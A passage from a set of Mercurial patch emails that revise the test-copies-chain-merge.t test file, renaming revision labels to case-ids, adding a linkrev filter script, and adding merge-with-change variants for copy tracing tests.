-Gfr 'desc("mGFm-0")' d - o 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way + o mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mGFm-0")' d - o 25 g-1: update d + o g-1: update d | - o 2 i-2: c -move-> d + o i-2: c -move-> d | ~ #endif @@ -2048,19 +2048,19 @@ copy tracing chain. $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - o 31 mGCm-0 merge updated/deleted - revive the file (updated content) - the other way + o mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 merge updated/deleted - revive the file (updated content) - one way + +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 6 c-1 delete d + o | c-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h 'a' is the copy source of 'd' @@ -2093,19 +2093,19 @@ copy tracing chain. $ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - o 33 mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d | - o 1 i-1: a -move-> c + o i-1: a -move-> c | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h 'a' is the the copy source of 'd' @@ -2139,19 +2139,19 @@ (the copy information from the branch that was not deleted should win). $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - o 36 mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + o mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way |\ - +---o 35 mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way + +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way | |/ - | o 34 h-1: b -(move)-> d + | o h-1: b -(move)-> d | | - o | 6 c-1 delete d + o | c-1 delete d | | - o | 2 i-2: c -move-> d + o | i-2: c -move-> d | | - o | 1 i-1: a -move-> c + o | i-1: a -move-> c |/ - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCH-delete-before-conflict-m")' # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613770045 -3600 # Fri Feb 19 22:27:25 2021 +0100 # Node ID cb15216a52f5b86a144ea2f1c1966f119673b961 # Parent 74e2256a56b8a57f3aa556d0601b0e47dd41570d test-copies: use "case-id" instead of revision number when listing sidedata The revision number are not very informative and can change when new changeset are added, creating unnecessary churn. We change the template before adding more test to improve clarify of the over changesets. Differential Revision: https://phab.mercurial-scm.org/D10049 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1074,266 +1074,267 @@ added : h, ; $ for rev in `hg log --rev 'all()' -T '{rev}\n'`; do - > echo "##### revision $rev #####" + > case_id=`hg log -r $rev -T '{word(0, desc, ":")}\n'` + > echo "##### revision \"$case_id\" #####" > hg debugsidedata -c -v -- $rev > hg debugchangedfiles $rev > done - ##### revision 0 ##### + ##### revision "i-0 initial commit" ##### 1 sidedata entries entry-0014 size 34 '\x00\x00\x00\x03\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00abh' added : a, ; added : b, ; added : h, ; - ##### revision 1 ##### + ##### revision "i-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ac' removed : a, ; added p1: c, a; - ##### revision 2 ##### + ##### revision "i-2" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00cd' removed : c, ; added p1: d, c; - ##### revision 3 ##### + ##### revision "a-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00de' removed : d, ; added p1: e, d; - ##### revision 4 ##### + ##### revision "a-2" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ef' removed : e, ; added p1: f, e; - ##### revision 5 ##### + ##### revision "b-1" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00b' touched : b, ; - ##### revision 6 ##### + ##### revision "c-1 delete d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d' removed : d, ; - ##### revision 7 ##### + ##### revision "d-1 delete d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d' removed : d, ; - ##### revision 8 ##### + ##### revision "d-2 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 9 ##### + ##### revision "e-1 b -move-> g" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bg' removed : b, ; added p1: g, b; - ##### revision 10 ##### + ##### revision "e-2 g -move-> f" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00fg' added p1: f, g; removed : g, ; - ##### revision 11 ##### + ##### revision "mBAm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 12 ##### + ##### revision "mABm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 13 ##### + ##### revision "mBCm-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 14 ##### + ##### revision "mBCm-1 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 15 ##### + ##### revision "mCBm-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 16 ##### + ##### revision "mCBm-1 re-add d" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d' added : d, ; - ##### revision 17 ##### + ##### revision "mBDm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 18 ##### + ##### revision "mDBm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 19 ##### + ##### revision "mAEm-0 merge with copies info on both side - A side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; - ##### revision 20 ##### + ##### revision "mEAm-0 merge with copies info on both side - A side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; - ##### revision 21 ##### + ##### revision "f-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00hi' removed : h, ; added p1: i, h; - ##### revision 22 ##### + ##### revision "f-2" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00di' touched p1: d, i; removed : i, ; - ##### revision 23 ##### + ##### revision "mBFm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 24 ##### + ##### revision "mFBm-0 simple merge - B side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 25 ##### + ##### revision "g-1" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' touched : d, ; - ##### revision 26 ##### + ##### revision "mDGm-0 actual content merge, copies on one side - D side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 27 ##### + ##### revision "mGDm-0 actual content merge, copies on one side - D side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 28 ##### + ##### revision "mFGm-0 merge - G side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 29 ##### + ##### revision "mGFm-0 merge - G side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' merged : d, ; - ##### revision 30 ##### + ##### revision "mCGm-0 merge updated/deleted - revive the file (updated content) - one way" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 31 ##### + ##### revision "mGCm-0 merge updated/deleted - revive the file (updated content) - the other way" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 32 ##### + ##### revision "mCB-revert-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 33 ##### + ##### revision "mBC-revert-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' salvaged : d, ; - ##### revision 34 ##### + ##### revision "h-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bd' removed : b, ; added p1: d, b; - ##### revision 35 ##### + ##### revision "mCH-delete-before-conflict-m-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 36 ##### + ##### revision "mHC-delete-before-conflict-m-0 simple merge - C side" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 37 ##### + ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' added : unrelated-j, ; - ##### revision 38 ##### + ##### revision "k-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-k' added : unrelated-k, ; - ##### revision 39 ##### + ##### revision "mAE,Km" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 40 ##### + ##### revision "mK,AEm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 41 ##### + ##### revision "mEA,Jm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 42 ##### + ##### revision "mJ,EAm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 43 ##### + ##### revision "l-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-l' added : unrelated-l, ; - ##### revision 44 ##### + ##### revision "mBC+revert,Lm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 45 ##### + ##### revision "mCB+revert,Lm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 46 ##### + ##### revision "mL,BC+revertm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 47 ##### + ##### revision "mL,CB+revertm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 48 ##### + ##### revision "n-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-n' added : unrelated-n, ; - ##### revision 49 ##### + ##### revision "o-1" ##### 1 sidedata entries entry-0014 size 24 '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-o' added : unrelated-o, ; - ##### revision 50 ##### + ##### revision "mFG,Om" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 51 ##### + ##### revision "mO,FGm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 52 ##### + ##### revision "mGF,Nm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' - ##### revision 53 ##### + ##### revision "mN,GFm" ##### 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613771806 -3600 # Fri Feb 19 22:56:46 2021 +0100 # Node ID 9cd4f58467af8cf237979946ab4da058033b5aa6 # Parent cb15216a52f5b86a144ea2f1c1966f119673b961 test-copies: filter out the linkrev part of `debugindex` It is not really useful for the tests and is a large source of churn when adding more revisions to the tests. Differential Revision: https://phab.mercurial-scm.org/D10050 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -14,6 +14,19 @@ use git diff to see rename + $ cat << EOF >> ./no-linkrev + > #!$PYTHON + > # filter out linkrev part of the debugindex command + > import sys + > for line in sys.stdin: + > if " linkrev " in line: + > print(line.rstrip()) + > else: + > l = "%s *%s" % (line[:6], line[14:].rstrip()) + > print(l) + > EOF + $ chmod +x no-linkrev + $ cat << EOF >> $HGRCPATH > [diff] > git=yes @@ -372,12 +385,12 @@ created new head $ hg mv --force i d $ hg commit -m "f-2: rename i -> d" - $ hg debugindex d + $ hg debugindex d | ../no-linkrev rev linkrev nodeid p1 p2 - 0 2 d8252ab2e760 000000000000 000000000000 (no-changeset !) - 0 2 ae258f702dfe 000000000000 000000000000 (changeset !) - 1 8 b004912a8510 000000000000 000000000000 - 2 22 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) + 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 * ae258f702dfe 000000000000 000000000000 (changeset !) + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) $ hg up 'desc("b-1")' 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) @@ -1543,13 +1556,13 @@ $ hg manifest --debug --rev 'desc("b-1")' | grep '644 d' d8252ab2e760b0d4e5288fd44cbd15a0fa567e16 644 d (no-changeset !) ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !) - $ hg debugindex d | head -n 4 + $ hg debugindex d | head -n 4 | ../no-linkrev rev linkrev nodeid p1 p2 - 0 2 d8252ab2e760 000000000000 000000000000 (no-changeset !) - 0 2 ae258f702dfe 000000000000 000000000000 (changeset !) - 1 8 b004912a8510 000000000000 000000000000 - 2 22 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) - 2 25 5cce88bf349f ae258f702dfe 000000000000 (changeset !) + 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 * ae258f702dfe 000000000000 000000000000 (changeset !) + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) + 2 * 5cce88bf349f ae258f702dfe 000000000000 (changeset !) Log output should not include a merge commit as it did not happen @@ -1610,11 +1623,11 @@ b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' e8825b386367b29fec957283a80bb47b47483fe1 644 f - $ hg debugindex f + $ hg debugindex f | ../no-linkrev rev linkrev nodeid p1 p2 - 0 4 b76eb76580df 000000000000 000000000000 - 1 10 e8825b386367 000000000000 000000000000 - 2 19 2ff93c643948 b76eb76580df e8825b386367 + 0 * b76eb76580df 000000000000 000000000000 + 1 * e8825b386367 000000000000 000000000000 + 2 * 2ff93c643948 b76eb76580df e8825b386367 #else $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f @@ -1624,9 +1637,9 @@ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f - $ hg debugindex f + $ hg debugindex f | ../no-linkrev rev linkrev nodeid p1 p2 - 0 4 ae258f702dfe 000000000000 000000000000 + 0 * ae258f702dfe 000000000000 000000000000 #endif # Here the filelog based implementation is not looking at the rename # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1614019173 -3600 # Mon Feb 22 19:39:33 2021 +0100 # Node ID 3aef76c3fd3822d134d12eb5c8fb2eb2c77738bc # Parent 9cd4f58467af8cf237979946ab4da058033b5aa6 test-copies: add a "change during merge" variant to the A+E test Checks inline comment for details. diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -687,6 +687,60 @@ o i-0 initial commit: a b h +Variant of previous with extra changes introduced by the merge +-------------------------------------------------------------- + +Multiple cases above explicitely test cases where content are the same on both side during merge. In this section we will introduce variants for theses cases where new change are introduced to these file content during the merges. + + +Subcase: merge has same initial content on both side, but merge introduced a change +``````````````````````````````````````````````````````````````````````````````````` + +Same as `mAEm` and `mEAm` but with extra change to the file before commiting + +- the "e-" branch renaming b to f (through 'g') +- the "a-" branch renaming d to f (through e) + + $ case_desc="merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent)" + + $ hg up 'desc("a-2")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("e-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo "content change for mAE-change-m" > f + $ hg ci -m "mAE-change-m-0 $case_desc - one way" + created new head + $ hg up 'desc("e-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("a-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo "content change for mEA-change-m" > f + $ hg ci -m "mEA-change-m-0 $case_desc - the other way" + created new head + $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))' + @ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |\ + +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d + | + o i-1: a -move-> c + | + o i-0 initial commit: a b h + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ @@ -703,7 +757,7 @@ (extra unrelated changes) $ hg up 'desc("a-2")' - 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ echo j > unrelated-j $ hg add unrelated-j $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)' @@ -1001,6 +1055,7 @@ l-1: unrelated changes (based on "c" changes) mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way mAE,Km: chained merges (conflict -> simple) - same content everywhere + mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) @@ -1018,6 +1073,7 @@ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEA,Jm: chained merges (conflict -> simple) - same content everywhere + mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way mFG,Om: chained merges (copy-overwrite -> simple) - same content @@ -1278,6 +1334,16 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision "mAE-change-m-0 merge with file update and copies info on both side - A side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' + merged : f, ; + ##### revision "mEA-change-m-0 merge with file update and copies info on both side - A side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' + merged : f, ; ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 @@ -1628,6 +1694,8 @@ 0 * b76eb76580df 000000000000 000000000000 1 * e8825b386367 000000000000 000000000000 2 * 2ff93c643948 b76eb76580df e8825b386367 + 3 * 2f649fba7eb2 b76eb76580df e8825b386367 + 4 * 774e7c1637d5 e8825b386367 b76eb76580df #else $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f @@ -1640,6 +1708,8 @@ $ hg debugindex f | ../no-linkrev rev linkrev nodeid p1 p2 0 * ae258f702dfe 000000000000 000000000000 + 1 * d3613c1ec831 ae258f702dfe 000000000000 + 2 * 05e03c868bbc ae258f702dfe 000000000000 #endif # Here the filelog based implementation is not looking at the rename @@ -2191,6 +2261,133 @@ $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mHC-delete-before-conflict-m")' R a +Variant of previous with extra changes introduced by the merge +-------------------------------------------------------------- + +(see case declaration for details) + +Subcase: merge has same initial content on both side, but merge introduced a change +``````````````````````````````````````````````````````````````````````````````````` + +- the "e-" branch renaming b to f (through 'g') +- the "a-" branch renaming d to f (through e) +- the merge add new change to b + + $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))' + o mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |\ + +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d + | + o i-1: a -move-> c + | + o i-0 initial commit: a b h + +#if no-changeset + $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f' + 2f649fba7eb284e720d02b61f0546fcef694c045 644 f + $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f' + 774e7c1637d536b99e2d8ef16fd731f87a82bd09 644 f + $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' + b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f + $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' + e8825b386367b29fec957283a80bb47b47483fe1 644 f + $ hg debugindex f | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * b76eb76580df 000000000000 000000000000 + 1 * e8825b386367 000000000000 000000000000 + 2 * 2ff93c643948 b76eb76580df e8825b386367 + 3 * 2f649fba7eb2 b76eb76580df e8825b386367 + 4 * 774e7c1637d5 e8825b386367 b76eb76580df +#else + $ hg manifest --debug --rev 'desc("mAE-change-m-0")' | grep '644 f' + d3613c1ec8310a812ac4268fd853ac576b6caea5 644 f + $ hg manifest --debug --rev 'desc("mEA-change-m-0")' | grep '644 f' + 05e03c868bbcab4a649cb33a238d7aa07398a469 644 f + $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f + $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f + $ hg debugindex f | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * d3613c1ec831 ae258f702dfe 000000000000 + 2 * 05e03c868bbc ae258f702dfe 000000000000 +#endif + +# Here the filelog based implementation is not looking at the rename +# information (because the file exist on both side). However the changelog +# based on works fine. We have different output. + + $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAE-change-m-0")' + M f + b (no-filelog !) + R b + $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEA-change-m-0")' + M f + b (no-filelog !) + R b + $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAE-change-m-0")' + M f + d (no-filelog !) + R d + $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEA-change-m-0")' + M f + d (no-filelog !) + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")' + A f + d + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("e-2")' + A f + b + R b + +# From here, we run status against revision where both source file exists. +# +# The filelog based implementation picks an arbitrary side based on revision +# numbers. So the same side "wins" whatever the parents order is. This is +# sub-optimal because depending on revision numbers means the result can be +# different from one repository to the next. +# +# The changeset based algorithm use the parent order to break tie on conflicting +# information and will have a different order depending on who is p1 and p2. +# That order is stable accross repositories. (data from p1 prevails) + + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mAE-change-m-0")' + A f + d + R b + R d + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mEA-change-m-0")' + A f + d (filelog !) + b (no-filelog !) + R b + R d + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m-0")' + A f + a + R a + R b + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m-0")' + A f + a (filelog !) + b (no-filelog !) + R a + R b + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613749075 -3600 # Fri Feb 19 16:37:55 2021 +0100 # Node ID 664bee002d1a3c11b5042d7bf2c56066c1953d8a # Parent 3aef76c3fd3822d134d12eb5c8fb2eb2c77738bc test-copies: introduce merge chaing test for the A/E + change tests This is similar to the chaining test we have for the A/E merges (without change). The current result of this tests is wrong, as for they "without change counter part". This will be fixed by a later changesets. Differential Revision: https://phab.mercurial-scm.org/D10052 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1027,6 +1027,89 @@ o i-0 initial commit: a b h +Subcase: chaining conflicting rename resolution, with extra change during the merge +``````````````````````````````````````````````````````````````````````````````````` + +The "mEA-change-m-0" and "mAE-change-m-0" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + + $ case_desc="chained merges (conflict+change -> simple) - same content on both branch in the initial merge" + + +(merge variant 1) + + $ hg up 'desc("mAE-change-m")' + 2 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ hg merge 'desc("k-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mAE-change,Km: $case_desc" + +(merge variant 2) + + $ hg up 'desc("k-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ hg merge 'desc("mAE-change-m")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mK,AE-change-m: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mEA-change-m")' + 1 files updated, 0 files 